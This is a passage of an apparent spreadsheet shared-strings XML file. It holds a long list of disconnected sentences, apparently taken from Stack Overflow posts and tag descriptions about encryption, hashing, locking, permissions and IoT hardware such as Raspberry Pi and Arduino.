    <t>JNCryptor is a Java library that simplifies the process of encrypting data securely using AES.</t>
  </si>
  <si>
    <t>Protect your data against a configurable number of simultaneous failures.</t>
  </si>
  <si>
    <t>A novel replication protocol called value-dependent chaining is responsible for these strong guarantees.</t>
  </si>
  <si>
    <t>Thrown when EntityManager.lock is used with pessimistic locking is
used and the entity no longer exists in the database.</t>
  </si>
  <si>
    <t>Interoperability of even similar devices from different manufacturers is not assured by compliance with the signal levels alone.</t>
  </si>
  <si>
    <t>For example, digital certificates are protected within tamper-proof cryptographic processors.</t>
  </si>
  <si>
    <t>Any number of key/value pairs may be encoded in a single AMP packet.</t>
  </si>
  <si>
    <t xml:space="preserve">
LTPA - Lightweight Third-Party Authentication is a IBM provided mechanism to achieve Single Sign-On between IBM WebSphere servers and Lotus Domino servers.</t>
  </si>
  <si>
    <t>The cookies are encrypted and contains (as a minimum requirement) the user's login.</t>
  </si>
  <si>
    <t>Check constraints can not be used to validate columns between different rows.</t>
  </si>
  <si>
    <t>A UUID is 128 bits long, and can guarantee uniqueness
  across space and time.</t>
  </si>
  <si>
    <t>JSON Web Encryption (JWE) [RFC7516] represents encrypted content using JSON-
based data structures [RFC7159].</t>
  </si>
  <si>
    <t>That's why every application must request CPU resources, using wake locks.</t>
  </si>
  <si>
    <t>pidCrypt supports RSA and AES encryption and decryption, MD5 and SHA Hashes, ASN parsing and Base64/UTF8 en-/decoding.</t>
  </si>
  <si>
    <t>Security &amp; encryption: Active Directory/LDAP authentication, authorization, and 3DES/AES-256 encryption.</t>
  </si>
  <si>
    <t>When a nonce+counter is reused for the same key, this gives an attacker a non-negligible advantage at recovering the plaintext.</t>
  </si>
  <si>
    <t>QPDF is capable of creating linearized (also known as web-optimized) files and encrypted files.</t>
  </si>
  <si>
    <t>After that bugs and security issues will no be longer be fixed for Drupal 6.</t>
  </si>
  <si>
    <t>Handles shrinking, obfuscation, repackaging and multidex
Using a separate package such as ProGuard is no longer necessary.</t>
  </si>
  <si>
    <t>Policies and permissions can be managed down to the resource level allowing different access levels for different users.</t>
  </si>
  <si>
    <t>Files which you choose to protect are encrypted when committed, and decrypted when checked out.</t>
  </si>
  <si>
    <t>Argon2 is a hashing algorithm designed for the Password Hashing Competition, which it ultimately won.</t>
  </si>
  <si>
    <t>Software products may need an ECCN if they're exported from the US, particularly if they contain cryptographic algorithms.</t>
  </si>
  <si>
    <t>"a bidirectional tunnel for confidential data with verified integrity and mutual authentication"); they are then called protocols.</t>
  </si>
  <si>
    <t>Reversing the process, that is transforming the ciphertext into plaintext, is called decryption.</t>
  </si>
  <si>
    <t>In symmetric encryption the encryption and decryption keys are the one and the same; this single key is sometimes called the shared secret key.</t>
  </si>
  <si>
    <t>In this case, an error is generated if keyname represents an invalid
  key in the collection.</t>
  </si>
  <si>
    <t>PGP and similar products follow the OpenPGP standard (RFC 4880) for encrypting and decrypting data.</t>
  </si>
  <si>
    <t>These services include
   confidentiality, key management, authentication, and digital
   signatures.</t>
  </si>
  <si>
    <t>The goal is for homophones to be encoded to the same representation so that they can be matched despite minor differences in spelling.</t>
  </si>
  <si>
    <t>Files are protected by password-based symmetric cryptography.</t>
  </si>
  <si>
    <t>There is also a FileChannel with locking primitives and a capability to provide memory-mapped files.</t>
  </si>
  <si>
    <t>SignatureValue - Contains the output after calculating the signature of the whole SignedInfo element after canonicalizing it using the algorithm specified in the CanonicalizationMethod element.</t>
  </si>
  <si>
    <t>Depending on the tags it's used with, it can refer to:
Blocking access to certain resources.</t>
  </si>
  <si>
    <t>Derivative terms, such as Super Wi-Fi, coined by the U.S. Federal Communications Commission (FCC) to describe proposed networking in the former UHF TV band in the US, may or may not be sanctioned by the alliance.</t>
  </si>
  <si>
    <t>Third-party modules can expand the permissions by implementing hook_perm() (Drupal 6) or hook_permission() (Drupal 7).</t>
  </si>
  <si>
    <t>The Frege type system guarantees that any caller of main must also be of some IO type and is thus also marked as impure.</t>
  </si>
  <si>
    <t>UTF-32 is a character encoding that represents all unicode code points in four bytes each.</t>
  </si>
  <si>
    <t>In principle a primary key is no different in features or function from a non-primary key.</t>
  </si>
  <si>
    <t>Itanium (/atenim/) is a family of 64-bit Intel microprocessors that implement the Intel Itanium architecture (formerly called IA-64).</t>
  </si>
  <si>
    <t>My Mac is running High Seirra with openssl version 
LibreSSL 2.6.4
My Raspberry Pi is running Raspbian GNU/Linux 9 (stretch) with openssl version
OpenSSL 1.1.0f  25 May 2017
Looking further into this, I encrypted the same file which contained the text hello on both machines with the same password (using -nosalt).</t>
  </si>
  <si>
    <t>MurmurHash is a non-cryptographic hash function suitable for general hash-based lookup.</t>
  </si>
  <si>
    <t>A commercial client/server system for using and managing standard digital signatures (PKI).</t>
  </si>
  <si>
    <t>An access system in which processes may be blocked until the fanotify userspace listener has decided if the operation should be allowed.</t>
  </si>
  <si>
    <t>Set the decryption method temporarily to NoPadding or whatever equivalent your library uses.</t>
  </si>
  <si>
    <t>Before the release of the 80286, which introduced protected-mode  real mode was the only available mode for x86 CPUs.</t>
  </si>
  <si>
    <t>I ask because I want to compile and use an encryption library like openssl or crypto++ an Arduino Due (with a 32 bit arm processor).</t>
  </si>
  <si>
    <t>When you attempt to connect to it, it will sign something in a way that only the private key owner could sign, and you can verify this using your public key.</t>
  </si>
  <si>
    <t>I would agree that it's a bug in the XBee firmware and it shouldn't lock up if you continue to send bytes after it de-asserts CTS.</t>
  </si>
  <si>
    <t>Real-time memory locking in SunOS is provided by a set of library routines.</t>
  </si>
  <si>
    <t>As a result, many new programmers would turn to the insecure sha1 and md5 hashing systems that have been around for a long time.</t>
  </si>
  <si>
    <t>The digest includes the salt used to generate it, so that, when the user re-enters their password, the digest can be recalculated and compared with the previously stored value.</t>
  </si>
  <si>
    <t>Ed25519 is a public-key signature system with several attractive features:
Fast single-signature verification.</t>
  </si>
  <si>
    <t>"Proofs" can be valid or invalid; only the former kind constitutes actual proof, whereas the latter kind usually refers to a flawed attempt at proof.</t>
  </si>
  <si>
    <t>Or it could be due to lack of official or standard reference examples for correct encryption of a specific string and key.</t>
  </si>
  <si>
    <t>I have achieved the desired result, and in as far as I think I have done it in a safe way, I want to confirm it is in fact SAFE, and have I gone about it the right (best) way, or can I achieve this a much simpler way.</t>
  </si>
  <si>
    <t>I have two IoT rules in which one rule stores valid data to a table in DynamoDB, and other rule which stores invalid data to another table in DynamoDB.</t>
  </si>
  <si>
    <t>The data appears to be signed, if this is the case, you could try writing the word as is, and then using the libraries built in support for signed values to read it back in later.</t>
  </si>
  <si>
    <t>This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content.</t>
  </si>
  <si>
    <t>Fixed issue preventing decimal columns from being configured with the Identity store generated pattern.</t>
  </si>
  <si>
    <t>Firewalld is a service daemon with D-Bus interface
Firewalld provides a dynamically managed firewall with support for network/firewall zones that define the trust level of network connections or interfaces.</t>
  </si>
  <si>
    <t>OpenPGP software uses a combination of strong public-key and
   symmetric cryptography to provide security services for electronic
   communications and data storage.</t>
  </si>
  <si>
    <t>Predix captures and analyzes the unique volume, velocity, and variety of machine data generated across the industrial world within a secure, industrial-strength cloud environment.</t>
  </si>
  <si>
    <t>I am a bit new here on Stackoverflow (which you can probably see by my reputation), but I was wondering how to make an audible alert
or some other type of modification to an auto polling log file of failed login attempts for RDP (specifically XRDP) sessions on a 
Rasbperry Pi.</t>
  </si>
  <si>
    <t>However, for Android devices, you will typically receive a random serial number (that's a requirement for peer-to-peer mode) on every selection -- thus, no usefule information to identify a device.</t>
  </si>
  <si>
    <t>The following table provides the high-level recommendations for your choice of protocol:
MQTT(MQTT over WebSocket)
Use on all devices that do not require to connect multiple devices (each with its own per-device credentials) over the same TLS connection.</t>
  </si>
  <si>
    <t>If an anonymous user decides to sign up to your app, you can link their sign-in credentials to the anonymous account so that they can continue to work with their protected data in future sessions.</t>
  </si>
  <si>
    <t>It can perform various tasks such as creating, reading, updating or deleting databases, tables, columns or rows (crud); executing sql statements; or managing users and permissions.</t>
  </si>
  <si>
    <t>As I noticed it usually happens when I try to decrypt many (about 100) Strings in short time (2 requests arrive from FE, 15 record queried from db / request, 2 encrypted fields / record)
My server runs on a Raspberry Pi B+ with Raspbian.</t>
  </si>
  <si>
    <t>The important thing is that the package that I send has a field where I can put some identifier-number in (not encrypted), which can then be recieved by  another device like a smartphone where this identifier-number is extracted.</t>
  </si>
  <si>
    <t>Time consuming and slow to succeed if you have a long, strong WiFi password, but if your requirements are to be "completely safe", and you're liable to get in to long arguments with auditors, wpa_passphrase might not be worth the hassle.</t>
  </si>
  <si>
    <t>The main idea behind universal hashing is to select the hash function at random from a carefully designed class of functions at the beginning of execution</t>
  </si>
  <si>
    <t>Registering Broadcast Receiver
Creating the Broadcast Receiver
A broadcast receiver is implemented as a subclass of BroadcastReceiver class and overriding the onReceive() method where each message is received as a Intent object parameter.</t>
  </si>
  <si>
    <t>Network security group security rules are evaluated by priority using the 5-tuple information (source, source port, destination, destination port, and protocol) to allow or deny the traffic.</t>
  </si>
  <si>
    <t>These flaws can be fixed by a combination of a well designed packet format, including for example a unique header, checksum and/or end sequence and timeouts that cause the receiver to reset its state.</t>
  </si>
  <si>
    <t>If you will be placing this network on a vehicle's CAN bus, it is important to note that if you do not claim a source address on the vehicle bus, you may get a NAK from the main ECU whenever you try to place foreign information on the bus.</t>
  </si>
  <si>
    <t>By contrast if you don't need to hide all that stuff you just have to encrypt your data itself; a simple encryption algorithm is easy to implement, especially if you don't need to worry about people stealing your devices and getting the code.</t>
  </si>
  <si>
    <t>For example, some variables and data-structures (queue) are not protected from ISR context to main context, which may cause data integrity issue or even random Hard Fault.</t>
  </si>
  <si>
    <t>When getting inconsistent results between using the CLI and what you see on the AWS web based interfaces, always double check :
The AWS credential you are using for your CLI
The default region configured for your CLI
Logout of your shell and login again, double check the above, and you should see the same results.</t>
  </si>
  <si>
    <t>It was created for home users who know little or nothing about security, and, as such, are intimidated by the large amount of security options for WiFi Protected Access, to add devices easily without having to remember long passphrases.</t>
  </si>
  <si>
    <t>In Java 5.0, it was replaced by StringBuilder as this was faster, and there was almost not good use case for a thread safe StringBuffer and classes which attempted to use it as such ended up not being thread safe anyway.</t>
  </si>
  <si>
    <t>Update:
I do recommend to read a Reference - IoT Hub quotas and throttling
related to the limits and Updating a large number of device identities.</t>
  </si>
  <si>
    <t>To enter protected mode:
The Global Descriptor Table (GDT) must first be created with a minimum of three entries: a null descriptor, a code segment descriptor and data segment descriptor.</t>
  </si>
  <si>
    <t>One example of this process is the behavior of 64-bit versions of Windows Vista and 7: these versions allow only signed drivers to be installed in kernel mode.</t>
  </si>
  <si>
    <t>Though making fields required may not be an end-all validation technique, it is sufficient in a large number of cases.</t>
  </si>
  <si>
    <t>But what is much worse sometimes (statistically 1 to 5 maybe) I am getting
bus error 
or 
warning ** error retrieving accessibility bus address 
org.freedesktop.dbus.error.serviceunknown
or 
WARNING: Couldn't register with accessibility bus: Did not receive a reply.</t>
  </si>
  <si>
    <t>However, Yahoo mentions they are deprecating this kind of request, the /public/ part must be removed and a Key and Secret must be used.</t>
  </si>
  <si>
    <t>Then the reader will send M1 and random numbers to server (SQL): Reader -&gt; Server: R1, R2, M1
When the authentication is successful, both the tag and server have to update their data.</t>
  </si>
  <si>
    <t>I2C is kinda of a serial communication bus, and you can attack multiple slave devices to an I2C bus master.</t>
  </si>
  <si>
    <t>JSON Schema Faker is a JavaScript tool that combines JSON Schema standard with fake data generators, allowing users to generate fake data that conform to the schema.</t>
  </si>
  <si>
    <t>It is typically used to achieve cross-domain single sign-on (SSO) and creation of security tokens.</t>
  </si>
  <si>
    <t>OLTP and OLAP
FoundationDB is optimized for online transaction processing (OLTP) workloads consisting of many small reads and writes.</t>
  </si>
  <si>
    <t>Run tests using proffesional-level automated correlation
Many frameworks use various dynamically generated values for security reasons, such as for logging in.</t>
  </si>
  <si>
    <t>I want to access Characteristics and their UUID's to be able to modify their permission or to create a new service with its own characteristics suited to my project.</t>
  </si>
  <si>
    <t>CDS is a C++ template library of lock-free and fine-grained algorithms.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a command for installing cryptography, a Python library which exposes cryptographic recipes and primitives.</t>
  </si>
  <si>
    <t>Prompt users after sign-in or sign-up to store their credentials for future automatic authentication.</t>
  </si>
  <si>
    <t>I changed the keyboard mapping on my Raspberry Pi and am no longer able to login (because the keys I press are interpreted very differently; a "p" is an "r" etc.).</t>
  </si>
  <si>
    <t>I have no experience with ethernets or Udp's or any networking for that matter, so please elaborate to irrational amounts.</t>
  </si>
  <si>
    <t>I think the only reliable way is to encrypt the files while still on the PC (in every other way the files could be obtained as long as there is physical access to the rpi).</t>
  </si>
  <si>
    <t>Currently I have the Arduino hooked up to the lock and whenever the Android phone connects, it is allowed to lock and unlock.</t>
  </si>
  <si>
    <t>I double checked the connection string, the table access (from other tools) and the account.</t>
  </si>
  <si>
    <t>I have a key agreement protocol that runs between a node i and n other nodes in the CAN bus in parallel in order to establish a session key SK between i and each node j.</t>
  </si>
  <si>
    <t>I'm not trying to break encryption, just want to be aware of any BT-radio activity going on in the device's proximity...</t>
  </si>
  <si>
    <t>As it interprets these values as signed variables, checking, if they are greater than 0xc0 fails naturally.</t>
  </si>
  <si>
    <t>The last byte is the checksum which checks the validity of the current packet.</t>
  </si>
  <si>
    <t>The MIC is calculated from these and the secret network unique AppKey stored in the node.</t>
  </si>
  <si>
    <t>This data has no encoding and no protocol aside from a start sequence, after which it is raw binary data.</t>
  </si>
  <si>
    <t>So my question is, is it even possible to fully protect the system partition at the sector level with the UWF?</t>
  </si>
  <si>
    <t>We have being able to successfully connect using SAS tokens signed by the device primary keys, but trying to do so with Shared Access Policy keys doesn't seem to work.</t>
  </si>
  <si>
    <t>#
#ServerRoot "/etc/apache2"
#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.</t>
  </si>
  <si>
    <t>As an example AWS requires only a single certificate - depending on the TLS cipher selected.</t>
  </si>
  <si>
    <t>Assuming the line of communication is reliable (and as long as your wire isn't several dozen feet, it should be), you don't need more than that.</t>
  </si>
  <si>
    <t>If you set it as safe=true, then you will get the status of the insert operation.</t>
  </si>
  <si>
    <t>The bitwise-or assignment (|=) combines that new bit-mask with the existing bits in data.</t>
  </si>
  <si>
    <t>AltSoftSerial can handle this test easily, since it does not lock out interrupts for long times.</t>
  </si>
  <si>
    <t>There's no way for FreeRADIUS to check if decryption was successful, so the only way you know is if the decrypted password matches the users password.</t>
  </si>
  <si>
    <t>If you want 16-bit addressing you will probably need some kind of "master device" anyway to assign addresses on the PAN.</t>
  </si>
  <si>
    <t>FileZilla refuses to use weak encryption, so the server has to be updated to use strong encryption.</t>
  </si>
  <si>
    <t>You will be safe as long as the pin is never set to output and high.</t>
  </si>
  <si>
    <t>If you wait for the event callback before you allocate the buffers then you will have deadlock.</t>
  </si>
  <si>
    <t>Pad incoming messages with zeros or some type of guard bytes.</t>
  </si>
  <si>
    <t>One question is whether it's ok to enter some kind of a secret (a password) when the device boots up.</t>
  </si>
  <si>
    <t>A lock is an object that will make a thread wait until it can obtain it.</t>
  </si>
  <si>
    <t>way to spoof cell phone numbers is to run your call through your PBX and back out.</t>
  </si>
  <si>
    <t>I assume you have double checked device type/device id - that they actually exist in the platform.</t>
  </si>
  <si>
    <t>There is also option in the Linux to add 255 0 to every single byte received whenever there is an error after parity checking.</t>
  </si>
  <si>
    <t>You encrypt and save the output of a known word or sequence
repeat 2.</t>
  </si>
  <si>
    <t>This defaults to 86400 seconds (once per day) when using CCMP/GCMP as the group cipher and 600 seconds (once per 10 minutes) when using TKIP as the group cipher.</t>
  </si>
  <si>
    <t>The pin numbers follow the pin numbers on header P1.</t>
  </si>
  <si>
    <t>calling any function which is not speficied as signal-safe from a signal handler is undefined behaviour.</t>
  </si>
  <si>
    <t>I know this is a PI so debugging is probably limited but try outputting your id token and decryption its a jwt you should be able to see the iat and exp values.</t>
  </si>
  <si>
    <t>If your primary key (att_id, date) then you could not insert a given user with a given date more than once.</t>
  </si>
  <si>
    <t>If your disk is in ntfs format you really need to format it into ext4 - that gives to linux the possibilty of changing permissions on the disk.</t>
  </si>
  <si>
    <t>When any process wants to write, it must lock the entire database file for the duration of its update.</t>
  </si>
  <si>
    <t>To do that I saved all trusted numbers in the contact list on the sim card  (with the common prefix name 'mytrusted').</t>
  </si>
  <si>
    <t>Due to cross-domain security limitations its a bit challenge to connect iframes.</t>
  </si>
  <si>
    <t>This usually indicates that the decryption key or decryption method is incorrect, but may also be caused by message corruption or deliberate tampering.</t>
  </si>
  <si>
    <t>In cryptography, XTEA (eXtended TEA) is a block cipher designed to correct weaknesses in TEA.</t>
  </si>
  <si>
    <t>Check constraints can only validate columns of a single row.</t>
  </si>
  <si>
    <t>CurveZMQ is an authentication and encryption protocol for ZeroMQ based on CurveCP and NaCl - fast, secure elliptic-curve crypto.</t>
  </si>
  <si>
    <t>Credentials are stored on (local) authenticators which use and are accessed using strong cryptography.</t>
  </si>
  <si>
    <t>(HMAC)-based key derivation function (HKDF), which can be used as a
building block in various protocols and applications.</t>
  </si>
  <si>
    <t>Code signing your app assures users that it is from a known source and the app hasnt been modified since it was last signed.</t>
  </si>
  <si>
    <t>UTF-16 is a character encoding that represents Unicode code points using either 2 or 4 bytes per character.</t>
  </si>
  <si>
    <t>Depending on the implementation they may also provide delivery and order guarantees of the messages.</t>
  </si>
  <si>
    <t>Only those who possess the decryption key can reverse the process and recover the original plaintext.</t>
  </si>
  <si>
    <t>Under the Linksys brand, Cisco produces networking equipment for home and small businesses.</t>
  </si>
  <si>
    <t>Permissions define the operations that authenticated users are allowed to perform on file systems, databases and other computer systems.</t>
  </si>
  <si>
    <t>Passwords are primarily used as a way of accessing information and also limiting the number of users who can get access to a machine.</t>
  </si>
  <si>
    <t>UTF-32 is a character encoding that represents all Unicode code points in four bytes per character.</t>
  </si>
  <si>
    <t>This is often achieved by the assignation of a unique token, which the user must provide each time they invoke an operation within the application.</t>
  </si>
  <si>
    <t>The SSH protocol is encrypted, ensures data integrity, and provides strong means of authenticating both the server and the client.</t>
  </si>
  <si>
    <t>Moreover, it may cause DBMS performance degradation
since encryption generally forbids the use of index on encrypted data.</t>
  </si>
  <si>
    <t>Terminology
A "superkey" is any set of attributes that, when taken together, uniquely identify rows in the table.</t>
  </si>
  <si>
    <t>If locks cannot be granted immediately, these calls suspend the current thread.</t>
  </si>
  <si>
    <t>Digest also known as a hash value or key in software development, computer and engineering fields.</t>
  </si>
  <si>
    <t>Set your decryption method to expect that type of padding.</t>
  </si>
  <si>
    <t>This adds a column to the schema for the purpose of storing encrypted keys and metadata.</t>
  </si>
  <si>
    <t>An attack on the full Block TEA was described in (Saarinen, 1998), which also details a weakness in Block TEA's successor, XXTEA.</t>
  </si>
  <si>
    <t>ORA_HASH is a simple Oracle hashing function that returns a number.</t>
  </si>
  <si>
    <t>The primary key is embedded as a foreign key in any associated fact table.</t>
  </si>
  <si>
    <t>The user profile is considered a digital representation of the user, and is often associated with the online identity of the user.</t>
  </si>
  <si>
    <t>Locks help ensure referential integrity, especially with regards to foreign-keys.</t>
  </si>
  <si>
    <t>The primary application scenario is to enable serial devices to access network server applications, or vice versa, where security of the data on the LAN is not generally an issue.</t>
  </si>
  <si>
    <t>The Linux Unified Key Setup or luks is a disk-encryption specification created by Clemens Fruhwirth in 2004 and originally intended for linux.</t>
  </si>
  <si>
    <t>Also supports generating packages for distribution on the Mac App Store including jar signing.</t>
  </si>
  <si>
    <t>TimeUUID is a random global unique identifier (UUID) of 16 bytes.</t>
  </si>
  <si>
    <t>This built-in process performs optimistic locking behind the scenes to maintain the data integrity.</t>
  </si>
  <si>
    <t>Sn.exe provides options for key management, signature generation, and signature verification.</t>
  </si>
  <si>
    <t>Throughout this entire process, Yarn imposes strict guarantees around package installation.</t>
  </si>
  <si>
    <t>Some examples of PII include phone number, home address or (in the USA) social security number.</t>
  </si>
  <si>
    <t>Encrypted connections use the "wss://" URL scheme and default to port 443.</t>
  </si>
  <si>
    <t>git-crypt enables transparent encryption and decryption of files in a git repository.</t>
  </si>
  <si>
    <t>UTF-8 is a character-encoding that can describe the set of unicode code points in byte sequences of one to four bytes.</t>
  </si>
  <si>
    <t>UTF-16 is a character encoding that describes unicode code points in byte sequences of either two or four bytes.</t>
  </si>
  <si>
    <t xml:space="preserve">
NOTE: Sha1 is no longer secure due to collisions being found.</t>
  </si>
  <si>
    <t>The term "encryption" should be reserved for transformations intended to be reversed or "decrypted".</t>
  </si>
  <si>
    <t>Encrypting such files at rest helps protect them should physical security measures fail.</t>
  </si>
  <si>
    <t>Originally, our motivation to develop this stuff is to allow users of our pure java X servers, WiredX, to enjoy secure X sessions.</t>
  </si>
  <si>
    <t>cryptographic hashing), or perhaps re-tagging a question where the poster has displayed obvious naievity about it.</t>
  </si>
  <si>
    <t>Encrypt passwords, texts, numbers, binaries...
Transparent integration with Hibernate.</t>
  </si>
  <si>
    <t>Keycodes, control sequences and some random tips can be found on the wiki.</t>
  </si>
  <si>
    <t>64 bit version of the driver is only test-signed not signed as usually Microsft requires.</t>
  </si>
  <si>
    <t>MD5 md5 is an earlier cryptographic digest algorithm, now deprecated because collisions have been found, but still used in legacy systems.</t>
  </si>
  <si>
    <t>Keys in Relational Databases
Definition
A "superkey" is any set of attributes that, when taken together, uniquely identify rows in the table.</t>
  </si>
  <si>
    <t>ButtonA is never HIGH, so.. the code I'm tweaking shouldn't even matter (it all verifies and uploads fine.)</t>
  </si>
  <si>
    <t>Lets Encrypt provides great scripts for Apache 2 and NGINX but not Lighttpd which is much more comfortable for small systems like Raspberry Pi or old boxes.</t>
  </si>
  <si>
    <t>It defines typedefs that explicitly refer to the signedness and size of your variables.</t>
  </si>
  <si>
    <t>You could also check the new IoT solutions from Intel, they have a wide range of boards.</t>
  </si>
  <si>
    <t>A safer move might be to treat the Pi as an inherently insecure device.</t>
  </si>
  <si>
    <t>For all operations we internally make sure the device connection is opened.</t>
  </si>
  <si>
    <t>libphash is an open source perceptual hash library.</t>
  </si>
  <si>
    <t>c++11 library to ease hashing of user-defined types</t>
  </si>
  <si>
    <t>Locality-sensitive hashing (LSH) is a method of performing probabilistic dimension reduction of high-dimensional data.</t>
  </si>
  <si>
    <t>Using alert is only possible for small amounts of data since we must confirm each dialog.</t>
  </si>
  <si>
    <t>It is intended for use in systems that require high reliability and integrity.</t>
  </si>
  <si>
    <t>It is designed to protect data by providing encryption for entire volumes.</t>
  </si>
  <si>
    <t>To relax this sand-box the code needs to be digitally signed by the provider, and trusted by the end user.</t>
  </si>
  <si>
    <t>This information can be verified and trusted because it is digitally signed.</t>
  </si>
  <si>
    <t>There was a Persmissice Certificate Policy applied that blocked the certificate at one side of the project.</t>
  </si>
  <si>
    <t>ROT13 implements a method of encoding that obfuscates the plaintext.</t>
  </si>
  <si>
    <t>It maybe possible to use this if you have some knowledge of the data and/or can attach some circuit to fake some bits (to be removed later).</t>
  </si>
  <si>
    <t>I have mine logging on to my own mqtt broker I set up in a centos 7 box with encryption using x509 certs.</t>
  </si>
  <si>
    <t>For dmap driver model (i2c lightning) i changed the semaphore with a lock mechanism.</t>
  </si>
  <si>
    <t>Integrity is getting the data to the user that they expect without it being altered either by maliced or natural means.</t>
  </si>
  <si>
    <t>Every key and value is serial bytes with variable length.</t>
  </si>
  <si>
    <t>However, up to know I learnt, that training the network is the actual expensive part.</t>
  </si>
  <si>
    <t>Larger systems may separate the intelligence and the amplifier.</t>
  </si>
  <si>
    <t>Depends on what level of security you need.</t>
  </si>
  <si>
    <t>Ed25519 is a public-key signature system.</t>
  </si>
  <si>
    <t>Safari 7 uses WebKit2 and runs in 64-bit mode.</t>
  </si>
  <si>
    <t>your protocol is vulnerable to bit-flipping attacks from a MITM attacker, as well as not providing protection against snooping/monitoring, a MITM attacker will know what command you're giving, and be able to change the command given, both of which could be easily avoided...
i think it would be better if the client just asks for the random bytes as a token, and sends the actual command together with the token, encrypted.</t>
  </si>
  <si>
    <t>WebSEAL is a high performance, multi-threaded Web server that applies fine-grained security policy to the Tivoli Access Manager protected Web object space.</t>
  </si>
  <si>
    <t>This result in so much time due to the exception throw then the address "SlaveAddressNotAcknowledged", the time cost depends on the number of the addresses you scan.</t>
  </si>
  <si>
    <t>PHPDocX is a PHP library designed to generate completely dynamic, fully customizable and digitally signed Word documents.</t>
  </si>
  <si>
    <t>Questions that deal with the usage/troubleshooting of this API, or in some cases how to access lower level COM components that are not fully exposed by the API would be appropriate.</t>
  </si>
  <si>
    <t>*Purity* is a programming language concept which guarantees processing (usually a function) result is affected only by its input parameters.</t>
  </si>
  <si>
    <t>Failure to adhere to secure coding practices may result in various classes of vulnerabilities such as buffer overflows, integer overflow or wraparound, command-injection, improper sanitation of data, and more.</t>
  </si>
  <si>
    <t>These connections are non-blocking, which allows the main program thread to continue running, while a socket thread manages network traffic.</t>
  </si>
  <si>
    <t>However it is impossible to modify the data on those secure elements unless you re the logical owner of them (for embedded SE: that's typically the device manufacturer; for UICC: that's typically the mobile network operator).</t>
  </si>
  <si>
    <t>To be sure the resource will not stay permanently locked because of exception, the lock in normally released inside the  construct.</t>
  </si>
  <si>
    <t>Watchdog is great if you want your device to reboot autonomously  when your software blocks or Is not reachable anymore 
If that is what you want to achieve watchdog is the right choice.</t>
  </si>
  <si>
    <t>The classic combination of a user account number or name and a secret password is a widely-used example of IT credentials.</t>
  </si>
  <si>
    <t>Those functions can easily be searched for,
Hayoo searches identifiers and signatures throughout the entire Hackage database.</t>
  </si>
  <si>
    <t>Note: I am aware that when you try to verify the code it gives the error "empty character constant", as I am not aware of how to reset the value of morsecat so that it contains nothing.</t>
  </si>
  <si>
    <t>I get the following error: sqlite3.OperationalError: no such table: user
I've tried to grant absolute permissions to all files (chmod 777..., I know its not a good practice but I don't know what to do... ).</t>
  </si>
  <si>
    <t>My Arduino code I set up to test encrypting an decrypting:
My Android program is almost verbatim from the link above.</t>
  </si>
  <si>
    <t>BTW, the "aplay" application plays the same WAV file perfectly and reports the file is 16 bit signed LE, 44100Hz, stereo which matches what my application reports as well.</t>
  </si>
  <si>
    <t>I have been able to do these operations in the cmd line, but I don't know how to pull off the correct operations in php with the system function and not get the permission denied error.</t>
  </si>
  <si>
    <t>If the problem occurs, only the first few bytes are correct while the last 2 to 6 bytes are invalid (0 or the value of the dummy bytes).</t>
  </si>
  <si>
    <t>I'm currently implementing the Misty Block Cipher on Arduino IDE, and I'm facing a weird issue.</t>
  </si>
  <si>
    <t>With this protection in place, the system partition could be validated at the sector level and confirmed that it did not change.</t>
  </si>
  <si>
    <t>Hey all I am having the hardest time trying to figure out how to go about the order of decryption the encrypted text.</t>
  </si>
  <si>
    <t>The device probably cannot be woken from true CPU sleep (which is a level beyond having the screen off) by ordinary software/signalling means.</t>
  </si>
  <si>
    <t>Having one rx and one tx thread gives you a dilemma though: they are using the same port handle and they cannot freely access it, because that wouldn't be thread-safe.</t>
  </si>
  <si>
    <t>If uint8_t wasn't a (signed or unsigned) character type, then this would violate the strict aliasing rule.)</t>
  </si>
  <si>
    <t>For Reporting Services (SSRS) is a different story; I may try configure Basic Auth, but I cannot guaranteed everything works.</t>
  </si>
  <si>
    <t>As you are using the bytes as unsigned, it's best to tell the compiler explicitly so it doesn't make rash assumptions.</t>
  </si>
  <si>
    <t>Per https://msdn.microsoft.com/en-us/library/microsoft.azure.devices.client.deviceclient.aspx, Any instance members (of DeviceClient) are not guaranteed to be thread safe.</t>
  </si>
  <si>
    <t>The timeout parameter specifies how long the connection should wait for the lock to go away until raising an exception.</t>
  </si>
  <si>
    <t>What's wrong with a CRC checksum or similar, or a eventually a private hash algorithm, to ensure data integrity?</t>
  </si>
  <si>
    <t>Make sure you send AT command to initialise the modem and also AT+VCID=1 (or its equivalent) to enable the Caller ID feature.</t>
  </si>
  <si>
    <t>This means that the hubs will power the Raspberry Pi through its USB input cable, without the need for a separate micro-USB power cable, and bypass the voltage protection.</t>
  </si>
  <si>
    <t>takeaway
What you're trying to do is hard  that namely being:
running software on hardware that you have no control over and having to ensure the authenticity of the data it produced.</t>
  </si>
  <si>
    <t>It is still multithreaded though, so make sure you are protecting global data access/update with thread locking.</t>
  </si>
  <si>
    <t>You can make it accessible from all over the world at the extreme cost of giving up your LAN security.</t>
  </si>
  <si>
    <t>The following Python code is how I generate JWTs from the commandline for Curl-testing the HTTP endpoint assuming an RSA256 key:</t>
  </si>
  <si>
    <t>You need to :
Double check your IAM policies and ensure that the user that is using the CLI uses indeed uses the aws credentials (key and secret) that matches the IAM user that has the AWSIoTFullAccess.</t>
  </si>
  <si>
    <t>Not even read concurrency is supported - some people think that just because they don't modify the data, the read-only access is thread-safe.</t>
  </si>
  <si>
    <t>Context
Parity checks are used to ensure that the integrity of data is maintained when transmitted.</t>
  </si>
  <si>
    <t>A good way to retrieve the hash of a X.509 certificate using the SHA-256 hashing algorithm is to use the openssl command-line tool.</t>
  </si>
  <si>
    <t>Instead of checking for hash tags in the first token only, check the entire string.</t>
  </si>
  <si>
    <t>The text is encrypted for privacy when being used, and deleted from computer memory when no longer needed</t>
  </si>
  <si>
    <t>Google's common Java, C++ and Javascript library for parsing, formatting, storing and validating international phone numbers.</t>
  </si>
  <si>
    <t>XML Encryption, also known as XML-Enc, is a specification governed by a W3C recommendation, that defines how to encrypt the contents of an XML element.</t>
  </si>
  <si>
    <t>The process of enclosing a non-encrypted TCP stream inside of a second, SSH-encrypted stream.</t>
  </si>
  <si>
    <t>In computing, signedness is a property of data types representing numbers in computer programs.</t>
  </si>
  <si>
    <t>WS-Security is an extension to SOAP for applying security to web-services through XML Signature and XML Encryption.</t>
  </si>
  <si>
    <t>Docusign is an online service for collecting 'e-signatures' which allow users to sign forms using their web browser.</t>
  </si>
  <si>
